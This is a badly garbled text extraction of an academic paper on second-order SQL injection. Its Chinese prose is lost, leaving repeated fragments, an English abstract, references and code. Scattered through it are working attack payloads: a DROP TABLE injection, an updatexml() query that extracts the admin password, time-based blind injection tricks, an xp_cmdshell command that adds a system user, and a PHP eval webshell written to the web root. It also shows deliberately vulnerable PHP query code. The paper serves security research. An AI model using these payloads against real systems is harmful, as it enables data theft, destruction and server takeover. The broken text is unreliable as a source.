Research on second-order SQL injection techniques

Transcription

1 36 Z1 Vol.36 No.Z Journal on Communications November 2015 doi: /j.issn x SQL ( ) Web 3 SQL SQL SQL SQL 3 SQL Web 3 SQL SQL TP393 A Research on second-order SQL injection techniques LE De-guang 1, LI Xin 2, GONG Sheng-rong 1, ZHENG Li-xin 2 (1. Scholl of Computer Science & Engineering, Changshu Institute of Technology, Changshu , China; 2. College of Engineering, Huaqiao University, Quanzhou , China) Abstract: With the environment of new Web technologies, three kinds of second-order SQL injection techniques were proposed: blind second-order SQL injection, second-order SQL injection attacks the operating system and client second-order SQL injection. Experiments show that second-order SQL injection vulnerabilities exist widely in Web applications, and the proposed new second-order injection techniques can effectively commit attacks both server and client. Key words: SQL; second order SQL injection; blind injection; attack payload 1 Web Web Web OWASP open Web application security project SQL Web [1] SQL [2~7] SQL SQL SQL SQL SQL YAN [8] SQL SQL [9] SQL SQL HTML5 Web SQL SQL SQL HTML5 SQL SQL SQL SQL SQL Web ( ); (2013H2002) Foundation Items: The National Natural Science of Foundation of China( ); Fujian Internet of Things and Cloud Computing Program(2013H2002)

2 86 36 SQL SQL HTML5 SQL SQL SQL 2 SQL 2.1 SQL SQL Web Web SQL SQL [10] SQL [11] login.php $link = mysql_connect( localhost, root, root ); $query = SELECT * FROM Users WHERE username = $_POST[ username ] AND password = $_POST[ password ] ; $result = mysql_query( $query ) POST SQL username OR 1=1;DROP TABLE Users; --password SQL SELECT * FROM Users WHERE username = OR 1=1; DORP TABLE Users; -- AND password = SQL Users 1 SQL 1 SQL 1 Web Web SQL Web Web HTML SQL [12] 2.2 SQL SQL SQL SQL SQL 2 Web SQL [13] SQL Web Web SQL SQL $link = new mysqli ( localhost, root, root ); $query = INSERT INTO Users VALUES (?,?,? ) ; $cmd = $link->prepare ($qurey); $cmd->bind_param ( sss, $username, $password, $ ) ; $cmd->execute() SQL username password SQL SQL 123 WHERE 1=(updatexml(1,concat(0x5e24,(select password from admin limit 1),0x5e24),1)); -- Web

3 Z1 SQL 87 SQL $query = SELECT * FROM Users WHERE username=? AND password =? ; $result = mysql_query ($query) SQL username password Web SQL Web $result = mysql_query ($query); $row = mysql_fetch_array ($result); $username = $row[ username ]; $ = $row[ ]; $password = $_POST[ newpwd ]; $query = UPDATE Users SET username = $username, password = $password, = $emal WHERE username= $username ; ; $rs = mysql_query ($query) username password UPDATE SQL SQL UPDATE Users SET username =, password =, = 123 WHERE 1=(updatexml(1,concat(0x5e24,(select password from admin limit 1),0x5e24),1)); -- WHERE username= SQL updatexml() XPath admin SQL SQL 3 3 SQL (1)~5)) (6)~21))2 Web Web Web INSERT/UPDATE Web SQL Web Web SQL Web SQL SQL SQL 3 SQL SQL SQL SQL SQL Web 3 18 ~21 Web SQL / SQL SQL SQL SQL 3 SQL SQL 3 SQL 3.1 SQL SQL SQL SQL SQL SQL Web SQL [14] [15~17] SQL Web SQL [18] [19,20]

4 SQL 2 Web Web SQL SQL SELECT * FROM Article WHERE title = test AND 2=3 SQL SELECT * FROM Article WHERE title = 123 AND 2 = 3 2 = 3 false id = 1 WHERE false Web Test AND 3=3 SQL WHERE trueand 3=3 SQL SQL Web SQL test ;SELECT (IF ( user() = root ), SLEEP (4), 1 )Web SQL SELECT * FROM Article WHERE title = test ;SELECT ( IF ( user() = root ), SLEEP (4), 1) Web SLEEP(4) 4 s root 1 1 SQL Server WAITFOR DELAY 0:0:7 MySQL SLEEP (7); BENCHMARK ( ,md5( abc )) Oracle PostgreSQL BEGIN DBMS_LOCK.SLEEP( 7); END; SELECT UTL_INADDR.get_host_address ( test ) FROM dual; PG_SLEEP(7); GENERATE_SERIES(1, ) SQL A B B Web SQL 4 SQL SQL SQL Web

5 Z1 SQL 89 SQL WAF SQL SQL SQL WAF SQL 4 SQL 3.2 SQL SQL Server Oracle MySQL SQL xp_cmdshell EXEC master..xp_cmdshell net user john /add 2 2 MySQL MS-SQL Oracle LOAD DATA INFILE SELECT INTO OUT- LOAD_FILE SELECT INTO FILE(DUMPFILE) OUTFILE(DUMPFILE) BULK INSERT OLE Automation CLR Extend stored procedure BCP OLE Automation CLR Extend stored procedure Utl_file_dir/Oracle directories Oracle EXTPROC Java Java Oracle DBMS_SCHEDULER DBMS_ADVISOR SQL SQL Server sa MySQL FILE Web Web SELECT INSERT UPDATE SQL / INSERT FILE SQL Test ;SELECT <?php eval($_post[pass])?> INTO OUTFILE /var/www/a.php INSERT Web SQL SELECT * FROM Article WHERE title = Test ;SELECT <?php eval($_post[pass])?> INTO OUTFILE /var/www/a.php Web /var/www/ a.php Webshell SQL Web 3.3 SQL HTML5 SQL [21] JavaScript SQLite Webdb test id name var db; if (window.opendatabase){ db = opendatabase ( Webdb, 1.0, Web SQL Databses, ) ; db.transaction (function(tx){ tx.executesql ( CREATE TABLE IF NOT EXISTS test ( id int unique, name varchar(50), varchar(50) ) ) ; }); } HTML5 Web Web Web Web

6 90 36 HTML5 SQL SQL SQL 2 SQL SQL Web SQL 5 5 SQL 5 SQL 2 SQL Web Web SQL 2 SQL ID UPDATE SQL 4 3 SQL SQL 3 SQL Alexa [22] 30 SQL SQL 30 SQL SQL UPDATE SELECT 3 SELECT UPDATE INSERT 3 4 SQL SQL Linux+MySQL Web FILE LOAD_FILE SQL Server wscript.shell Oracle Java IO DBMS_JAVA_TEST.FUNCALL SQL

7 Z1 SQL SQL.... SQL /30 SQL /30 SQL / SQL SQL SQL UPDATE INSERT 2 SQL 2 SQL UPDATE SELECT SELECT 2 SQL.... SQL SQL SQL 3 SQL.... SQL SQL SELECT SLQ SQL SQL 36.67% 3 SQL Web SQL SQL 16.67% SQL Web sa root MySQL+Linux SQL 20% HTML5 6 PHP+MySQL+Apache+Linux SQL Web Web SQL $query = SELECT * FROM Users; ; $result = mysql_query ($query); $row = mysql_fetch_array ($result); $username = $row[ username ]; $ = $row[ ]; $password = $_POST[ newpwd ]; $query = UPDATE Users SET username = $username, password = $password, = $emal WHERE username= $username ; ; $rs = mysql_query ($query) Web Web

8 92 36 WAF SQL [23] 5 SQL 3 SQL 5 SQL WAF SQL SQL SQL 5 3 SQL SQL Web SQL SQL 3 SQL 3 SQ SQL SQL SQL SQL Web SQL WAF SQL 3 SQL 2 WAF WAF 3 SQL SQL HTML5 SQL 5 SQL Web Web SQL SQL SQL 3 SQL Web SQL [1] OSWAP. Category: OWASP top ten project [EB/OL]. [2],,,. SQL-on-Hadoop [J].,2014,35(Z1): ZHANG S Y JIANG K D WEI J W, et al. Network log analysis with SQL-on-Hadoop[J]. Journal on Communications, 2014, 35(Z1): [3] KIM M Y, LEE D H. Data-mining based SQL injection attack detection using internal query trees[j]. Expert Systems with Applications, 2014,41 (11): [4] SHAR L K, TAN H B K. Predicting SQL injection and cross site scripting vulnerabilities through mining input sanitization patterns[j]. Information and Software Technology, 2013,55(10): [5] JANG Y S, CHOI J Y. Detecting SQL injection attacks using query result size[j]. Computers & Security, 2014,44(7): [6] SHAR L K, TAN H B K. Defeating SQL injection[j]. IEEE Computer, 2013,46(3): [7],,,. Web SQL [J].,2012,22(11): TIAN W, XU J, YANG J F, et al. Model-driven penetration test of the SQL injection in Web applications[j]. Chinese High Technology Letters, 2012,22(11): [8] YAN L, LI X H, FENG R T, et al. Detection method of the second-order SQL injection in Web applications[j]. Lecture Notes in Computer Science, 2014, 8332: [9],,,. SQL [J].,2014,(11): TIAN Y J, ZHAO Z M, ZHANG H C, et al. Second-order SQL injection attack defense model [J]. Netinfo Security, 2014,(11): [10] PINZONA C I, PAZB J F D, HERRERO Á, et al. idmas-sql: intrusion detection based on MAS to detect and block SQL injection through data mining[j]. Information Sciences, 2013,231(5): [11] KIEYZUN A, GUO P J, JAYARAMAN K, et al. Automatic creation of

9 Z1 SQL 93 SQL Injection and cross-site scripting attacks[a]. Proceedings of the 31st International Conference on Software Engineering (ICSE), IEEE Computer Society[C]. Washington, DC, USA, [12] HALFOND W G J VIEGAS J ORSO A. A classification of SQL injection attacks and countermeasures[a]. Proceedings of the International Conference on Software Engineering[C]. Arlington, VA, USA, [13] DAHSE J, HOLZ T. Static detection of second-order vulnerabilities in Web applications[a]. Proceedings of the 23rd USENIX Conference on Security Symposium (USENIX)[C] [14] FOCARDI R, LUCCIO F L. SQUARCINA M. Fast SQL blind injections in high latency networks[a]. Proceedings of IEEE First AESS European Conference on Satellite Telecommunications (ESTEL)[C] [15] SADEGHIAN A, ZAMANI M, IBRAHIM S. SQL injection is still alive: a study on SQL injection signature evasion techniques[a]. Proceedings of International Conference on Informatics and Creative Multimedia (ICICM)[C] [16],,. [J].,2012,49(11): WANG Y LI Z J GUO T, et al. Literal tainting method for preventing code injection attack in Web application [J]. Journal of Computer Research and Development, 2012,49(11): [17],.SQL [J].,2012,39(z3):9-13. WANG W M LI H W. Research of the active defense technology for the SQL server injection attack [J]. Computer Science, 2012,39(z3): [18] DAHSE J, KREINN N, HOLZ T. Code reuse attacks in PHP: automated POP chain generation[a]. Proceedings of ACM SIGSAC Conference on Computer and Communications Security (CCS)[C]. New York, NY, USA, [19] MICROSOFT. Time-based blind SQL injection with heavy queries[eb/ol]. aspx [20] Practical identification of SQL injection vulnerabilities[eb/ol]. -Identification.pdf [21] MEIYAPPAN Y. Using the Web SQL database API in HTML 5 [EB/OL]. Using-the-Web-SQL-Database-API-in-HTML-5.htm [22] ALEXA. The top 1000 sites on the Web [EB/OL]. com/ topsites [23] BANDHAKAVF S, BISHT P, MADHUSUDAN P, et al. CANDID preventing SQL injection attacks using dynamic candidate evaluations [A]. Proceedings of the 14th ACM Conference on Computer and Communications Security (CCS)[C]. New York, NY, USA, ) 1990-) 1966-) 1967-)